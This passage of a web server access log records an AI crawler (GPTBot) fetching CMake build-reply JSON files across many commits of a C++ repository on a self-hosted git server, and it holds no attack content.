[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10791] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12461] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13509] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12620] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13912] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr 